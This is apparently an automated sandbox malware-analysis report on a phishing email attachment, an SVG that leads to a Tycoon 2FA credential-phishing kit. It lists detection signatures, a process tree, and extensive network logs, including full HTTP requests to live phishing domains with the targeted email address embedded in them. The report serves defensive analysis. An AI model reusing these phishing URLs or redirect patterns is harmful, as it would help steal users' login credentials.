Edit tour

Windows Analysis Report
Attached_image+from+ADMIN@weareworkspace.com.eml

Overview

General Information

Sample name:Attached_image+from+ADMIN@weareworkspace.com.eml
Analysis ID:1641469
MD5:2d1af9462bcd19be477567f98b92c668
SHA1:9a8d1963e58b01428e7978ecf98cf7e2be09dfa5
SHA256:9bfbd17ee769100f624267016c853a93c194b10b418b12c17d4601da5b44148c
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:88
Range:0 - 100
Confidence:100%

Signatures

Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
AI detected suspicious elements in Email content
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores large binary data to the registry

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 7148 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\Attached_image+from+ADMIN@weareworkspace.com.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 2984 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "C7C092BC-F5BA-4EAC-B301-6EE4C1945B50" "4DC11E76-292E-400D-89B7-9348BCE65614" "7148" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\2758881647.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2188,i,1755252170124573955,2774768264017984902,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • HxOutlook.exe (PID: 7972 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca MD5: DAE7C9F85DD916DCEB52B69422A09603)
  • HxAccounts.exe (PID: 3280 cmdline: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca MD5: AD64E194A7AE0AAE56E00CCA30F12D2E)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_73JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.3.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      1.3.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        1.7..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
          1.2.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            1.2.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
              Click to see the 3 entries
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
              Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\T3CX17XI\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 7148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_73, type: DROPPED
              Source: Yara matchFile source: 1.2.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.2.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.3.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.7..script.csv, type: HTML
              Source: Yara matchFile source: 1.0.pages.csv, type: HTML
              Source: 1.3.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, blocking keyboard shortcuts, disabling right-click context menus, and redirecting the user to an unrelated website. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from interacting with the page or redirecting them to a phishing site.
              Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cloud_weareworkspace_userid_admin_797870_1... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending data to an untrusted domain, which further increases the risk. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
              Source: 1.2.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behavior by using the `eval()` function to execute dynamic code, which poses a significant security risk. The script also appears to be heavily obfuscated, further increasing the risk. Overall, this script should be considered highly suspicious and potentially malicious.
              Source: EmailJoe Sandbox AI: Detected potential phishing email: The email is sent from an address (info@servis.ai) that does not match the domain of the supposed sender (ADMIN@weareworkspace.com), which is a common phishing tactic.. The email contains a generic message 'Above for your perusal' with an attachment, which is a typical phishing strategy to entice the recipient to open potentially malicious files.. The email includes a suspicious link to report spam, which could be a phishing link designed to harvest credentials or personal information.
              Source: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#madmin%40weareworkspace.comHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
              Source: EmailClassification: Credential Stealer
              Source: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/#madmin%40weareworkspace.comHTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.17:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.164:443 -> 192.168.2.17:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.17:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.17:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49737 version: TLS 1.2
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
              Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.67
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.67
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.67
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.67
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.67
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.67
              Source: global trafficHTTP traffic detected: GET /jFIlzWqSXCfn6wNHvB6C4VOJ6eUL2XfKC41xF6IAkhhtCs7xTdngwFjRLPyuMHCrRLgWgWS9Lz3mCBCLHAyGS3LqWNfKsMB2OjTOub2JcUNPZwEa39XlF6nCaRVOlRBan99j9oRo3PlIuwhrbT6tOqHhsNgZu1kNmotrgkGcmEpfwGfZL7kNR3x5TcEIoaX5gc4b5xlh/0kH7FYAJC6z7gu5UqtFDdKEemyYtMEX4qvSzJaofSVWjumVcKRIHYRUkgZosSgjugIzNpiZIWWgcI6g19a8O6BeSmjnpkEKsPmq0Er6nPcprXPaGCNbZmWTZK2XWUAP5b3Rtl7lXvyxtd8XxJRKonLcrA5T696jpVLnQ2nMY6AYJpsGmoAkzBk8CZJCvsxctEl43p0GK/admin@weareworkspace.com HTTP/1.1Host: mjj6bxg1xo.moydovv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /s23Rup/ HTTP/1.1Host: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://mjj6bxg1xo.moydovv.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DDmX_XoIBvXwOz5rXfO3j1wHm629DOTBS.sIeovNqDo-1742288336-1.0.1.1-UAveshrge6.kXwGfohoX.AUfsSK0xFlWsk7cf33p44O8TUYcriOfxawvJqOQgU0leuNFCXMxCEheidna.0pCILefkDRNrh2Wm_ybsDmiRxk
              Source: global trafficHTTP traffic detected: GET /loray$68hba2u HTTP/1.1Host: qnj64b.cuisbp.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /loray$68hba2u HTTP/1.1Host: qnj64b.cuisbp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru/s23Rup/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNYWTRidElnSU5rMU9hekhXYkR2VFE9PSIsInZhbHVlIjoibmZ3V2RGZVpGcjgwRTdKS1ZyQlpNWkpVZkgxdUhTak5VN2VtQmVyZEY2Wi9nT0N4STZyZjZyS1NGeU0wYm11c0NxWlF5M2IzeHZwUEhJQWNTWW5uR0NwLzAvdmsvM2lVa1FEWjl5VlhGV3JlRGdkYllwY0lyTW5tUkxKelVsKzAiLCJtYWMiOiIxZTc3MmE4MDUxNmJkMTRjMjM2ZDI4NjJiMWYzMTczMjQ3OWJmY2MwY2Q0NjdlYTY5YjcwYzkzZjNlNTMyNmQwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjU3OXBZRVhPaER0NlExYnFEU0g4RVE9PSIsInZhbHVlIjoiZ1VpcXlJMVVmRG9GaFlCOG1tVmZZWDA1WGtDQkgrNDZrL3JXeCt1M0lZTTZWNzJ5Z3BLeXZlT2IxajRoNnpXUnRDWW40elZFQWVYa3FRZDYwaHRJMG1LUnpMMVRQSlMwNTd4Nm56dThxdzhCejJKNG5xS3ZYSW1yV0V0RVJMSlgiLCJtYWMiOiI1MmRkODZhMTQ5NjQ2Mzc3MGMyNjkyZGM3Mjg1MWRiNGYzNjhmNmE0ZTJiMDM0MGRlMTMzMTJiZWJmOWU3YzhmIiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: mjj6bxg1xo.moydovv.com
              Source: global trafficDNS traffic detected: DNS query: cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: qnj64b.cuisbp.ru
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: unknownHTTP traffic detected: POST /report/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 540Content-Type: application/reports+jsonOrigin: https://cloud_weareworkspace_userid_admin_797870_1754_rapid-prototypi_.kvtwzs.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 08:59:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90lpMl7Mac9wXVL3CCWCwLlkaazUjV%2FAakqPfI%2BnTr3i3NwmI3T20R1QCSXhOeDdXfGm4wpD19oQ%2FP2eqnEHZu2MW0XHJR6oupfZDcm4uef7WamQSFT1B%2FWUHYFy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=28289&min_rtt=28265&rtt_var=10648&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2342&delivery_rate=101749&cwnd=251&unsent_bytes=0&cid=5ee237afc4059ba3&ts=114&x=0"Cache-Control: max-age=14400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 922388969acf0f78-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1469&rtt_var=567&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2009&delivery_rate=1903520&cwnd=233&unsent_bytes=0&cid=53d10da0d5ba754d&ts=8063&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49677
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.17:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.17:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.17:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.186.164:443 -> 192.168.2.17:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.17:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.17:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.17:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49737 version: TLS 1.2
